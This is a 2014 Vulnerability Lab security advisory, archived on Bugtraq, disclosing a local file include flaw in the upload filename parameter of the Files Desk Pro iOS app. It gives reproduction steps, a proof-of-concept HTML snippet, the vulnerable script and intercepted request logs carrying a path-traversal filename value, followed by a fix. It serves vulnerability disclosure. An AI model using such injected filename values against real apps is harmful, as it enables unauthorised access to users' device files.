Bugtraq mailing list archives

Files Desk Pro v1.4 iOS - File Include Web Vulnerability


From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 03 Jun 2014 12:29:36 +0200

Document Title:
===============
Files Desk Pro v1.4 iOS - File Include Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1266


Release Date:
=============
2014-05-16


Vulnerability Laboratory ID (VL-ID):
====================================
1266


Common Vulnerability Scoring System:
====================================
6.7


Product & Service Introduction:
===============================
FileDesk is iPhone/iPad app for managing your files. Read differect kind of files,Create PDFs with different contents, 
Make your 
documents/files private,Share Your files over WiFi. File Desk - A digital desk for your files. Manage your 
Documents/Files With File Desk.

(Copy of the Homepage: https://itunes.apple.com/ag/app/file-desk-pro-documents-manager/id600550320 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Files Desk 
Pro v1.4 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-05-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LiveBird Technologies Private Limited
Product: Files Desk Pro & Lite 1.4


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Files Desk Pro v1.4 iOS mobile 
web-application. 
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or 
system 
specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject 
own files 
with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The 
local file/path 
include execution occcurs in the `index file dir` list of the `filesdesk` manager. The attacker is able to inject the 
local file 
include request by usage of the `wifi interface` or by a local privileged application user accounts via `file 
sync`(app).

Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script 
codes to 
execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service 
and the 
request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high 
with a 
cvss (common vulnerability scoring system) count of 6.7.

Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application 
user 
account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile 
application 
or connected device component compromise.

Request Method(s):
                                [+] [POST] - Remote
                                [+] [SYNC] - Local

Vulnerable Module(s):
                                [+] FilesDesk Wifi (UI)

Vulnerable Function(s):
                                [+] Upload

Vulnerable Parameter(s):
                                [+] filename

Affected Module(s):
                                [+] Index File Dir Listing (http://localhost:8081/)


Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited local attackers without privileged application user 
account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below 
to continue.

Manual steps to reproduce ...
1. Install the FileDesk mobile application to your iOS device (ipad or iphone)
2. Start the local wifi web-server and share some random files
3. Connect with another remote computer to the local web-server interface url > web.localhost:8081
4. Start a session tamper and choose a random file to upload
5. Submit the upload form and intercept in the session to change the vulnerable filename value to a local device 
file/path
Note: Can also be combined with script codes and html tags
6. Refresh the index and the execution of the malicious request occurs in the index file dir list (name value)
7. Successful reproduce of the file include web vulnerability!


PoC:    FilesDesk Index

<table border="0" cellpadding="0" cellspacing="0">
                        <thead>
                         <tr><th>Name</th><th class="del">Delete</th></tr>
                        </thead>
                        <tbody id="filelist">
                        <tr><td><a href="/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png" class="file"><[LOCAL 
FILE/PATH INCLUDE 

VULNERABILITY!]">.png</a></td><td class='del'><form action='/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png' 

method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" 
class='button' 

/></td></tr></tbody></table></iframe></a></td></tr></tbody>
                </table>



Vulnerable Source:      Upload Script

<script type="text/javascript" charset="utf-8">
                var now = new Date();
                $.getJSON("/files?"+ now.toString(),
                function(data){
                  var shadow = false;
                  $.each(data, function(i,item){
                    var trclass='';
                    if (shadow)
                      trclass= " class='shadow'";
                        encodeName = encodeURI(item.name).replace("'", "'");
                  $("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + 
"</a></td>" + "<td 

class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' 
type='hidden'/><input name=

\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
                    shadow = !shadow;
                  });
                });
                </script>


--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://192.168.2.104:8081/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[67] 
Mime Type[text/html]
   Request Header:
      Host[192.168.2.104:8081]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://192.168.2.104:8081/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------147491436412682
Content-Disposition: form-data; name="newfile"; filename="%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png"
Content-Type: image/png


Status: 200[OK]
GET http://192.168.2.104:8081/ Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des 
Inhalts[2953] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[192.168.2.104:8081]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://192.168.2.104:8081/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[2953]
      Date[Do., 15 Mai 2014 14:27:35 GMT]




Status: 200[OK]
GET http://192.168.2.104:8081/files?Thu%20May%2015%202014%2016:14:57%20GMT+0200 Load Flags[LOAD_BACKGROUND  ] Größe des 
Inhalts[39] Mime Type[text/plain]
   Request Header:
      Host[192.168.2.104:8081]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[application/json, text/javascript, */*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://192.168.2.104:8081/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[39]
      Cache-Control[private, max-age=0, must-revalidate]
      Content-Type[text/plain; charset=utf-8]
      Date[Do., 15 Mai 2014 14:27:37 GMT]




Status: 200[OK]
GET http://192.168.2.104:8081/%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des 
Inhalts[0] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[192.168.2.104:8081]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://192.168.2.104:8081/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[0]
      Date[Do., 15 Mai 2014 14:27:38 GMT]




Reference(s):
http://web.localhost:8081/[x]
http://web.localhost:8081/files


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the filename value in the upload POST method request.
Disallow special chars for files and foldernames and restrict the user input. Encode and parse also the vulnerable name 
output value.


Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value is estimated as high(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or 
special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or 
encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com



Current thread: